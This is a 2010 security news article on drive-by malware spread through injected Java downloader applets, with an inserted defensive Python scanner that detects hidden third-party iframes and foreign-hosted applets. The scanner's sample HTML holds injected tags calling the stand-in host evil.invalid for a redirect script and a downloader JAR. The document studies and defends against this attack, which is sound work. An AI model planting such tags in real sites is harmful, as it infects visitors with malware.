Java Applet Distributes Trojan via Downloader Injection

Friday, December 31, 2010



More than two thousand web links direct users to domains that inject malicious code into visitors' browsers by way of a Java downloader applet.

The code is embedded in the HTML of the compromised sites, and infects visitors' computers through a hidden iframe that loads a JavaScript function.

The tactic relies on a Java downloader of the OpenConnection type, planted in website doorways and landing pages, and use of the method has increased dramatically over the last several months.

“The Top 20 malicious programs detected on the Internet in November included a total of nine exploits, three redirects and one script downloader that were used for carrying out drive-by downloads,” notes Vyacheslav Zakorzhevsky, a researcher at Kaspersky Lab.

Java-based exploits are common and extremely successful because the Java runtime is cross-platform: the same applet runs on any operating system that has Java installed.

The infection method is commonly referred to as a "drive-by" infection, in which attackers exploit vulnerabilities in legitimate websites to plant the malicious code, so that visitors are infected without taking any action themselves.

The injected code typically uses an iframe to pull in a redirect script from another domain, which ultimately results in the execution of malicious files on the targeted system.

The Java downloader applet injection differs from the iframe script redirect in that the applet itself fetches the payload, relying on Java's openConnection() networking call, from which the family takes its name, to download it to the target computer.
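The two injection patterns described above, the hidden third-party iframe and the applet tag pulling a JAR from another domain, can both be spotted with a static scan of a page's HTML. The following Python scanner is an added example, not code from the article or from Kaspersky; the sample page, the domain evil.invalid, the site host example.com, and the heuristics (an iframe is "hidden" when it is 0/1 pixel or styled display:none / visibility:hidden; an applet is suspect when its archive or class is served from a host outside the site's own domain) are all assumptions made for the illustration.

```python
"""Scan HTML for hidden third-party iframes and Java applets whose code is
loaded from a third-party domain. Added example; not the article's code."""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Inline-style fragments that make an element invisible (assumed heuristic).
HIDDEN_STYLES = ("display:none", "visibility:hidden")


def _is_hidden(attrs):
    """True if the tag is styled or sized so the visitor cannot see it."""
    style = attrs.get("style", "").replace(" ", "").lower()
    if any(s in style for s in HIDDEN_STYLES):
        return True
    try:
        width = int(attrs.get("width", "100"))
        height = int(attrs.get("height", "100"))
    except ValueError:          # e.g. "100%": treat as visible
        return False
    return width <= 1 or height <= 1


def _third_party(url, site_host):
    """True if url points at a host outside site_host and its subdomains."""
    host = (urlparse(url).hostname or "").lower()
    return bool(host) and host != site_host and not host.endswith("." + site_host)


class _Scanner(HTMLParser):
    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host
        self.findings = []      # list of (kind, url) tuples

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "iframe":
            src = a.get("src", "")
            if _is_hidden(a) and _third_party(src, self.site_host):
                self.findings.append(("hidden_iframe", src))
        elif tag in ("applet", "object", "embed"):
            # Applet code is named via archive/code/data/src; relative
            # values resolve against codebase.
            ref = a.get("archive") or a.get("code") or a.get("data") or a.get("src") or ""
            base = a.get("codebase", "")
            url = ref if ref.startswith("http") else base.rstrip("/") + "/" + ref
            is_java = (tag == "applet" or "java" in a.get("type", "").lower()
                       or ref.endswith((".jar", ".class")))
            if is_java and _third_party(url, self.site_host):
                self.findings.append(("java_applet", url))


def find_injections(html, site_host):
    """Return [(kind, url), ...] for every suspicious tag in html."""
    scanner = _Scanner(site_host.lower())
    scanner.feed(html)
    return scanner.findings


# Constructed sample: a page on example.com with two injected tags and two
# benign ones (a visible same-site iframe and a same-domain CDN applet).
SAMPLE = """<html><body>
<h1>Welcome</h1>
<iframe src="http://example.com/ads" width="300" height="250"></iframe>
<iframe src="http://evil.invalid/r.php" width="1" height="1" style="visibility: hidden"></iframe>
<applet code="Loader.class" archive="http://evil.invalid/dl.jar" width="1" height="1"></applet>
<object type="application/x-java-applet" data="http://cdn.example.com/game.jar"></object>
</body></html>"""

if __name__ == "__main__":
    for kind, url in find_injections(SAMPLE, "example.com"):
        print(kind, url)
```

Run against the constructed sample, the scanner reports the 1x1 hidden iframe on evil.invalid and the applet whose JAR is served from evil.invalid, and stays quiet about the visible ad frame and the applet hosted on the site's own CDN. It is a triage aid, not a blocker: obfuscated JavaScript that builds the iframe at runtime will not appear in the static HTML, so pair it with a rendered-DOM check or network logs.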

Java exploits are proving to be a major vehicle for the delivery of malware, and the problem only seems to be getting worse.


Fred Williams: The solution seems to be to keep up with the Java patches similar to Windows patches. The problem is that application compatibility concerns prevent our shop from patching Java every time a new update comes out.

Luckily, we are on Java 6 v. 21. A recent Slashdot story that I read indicates that many, many companies are still stuck on Java 1.4, especially larger companies. This problem could become a bigger attack vector in the future as malicious users try to find other doors into a company.
The views expressed in this post are the opinions of the Infosec Island member that posted this content. Infosec Island is not responsible for the content or messaging of this post.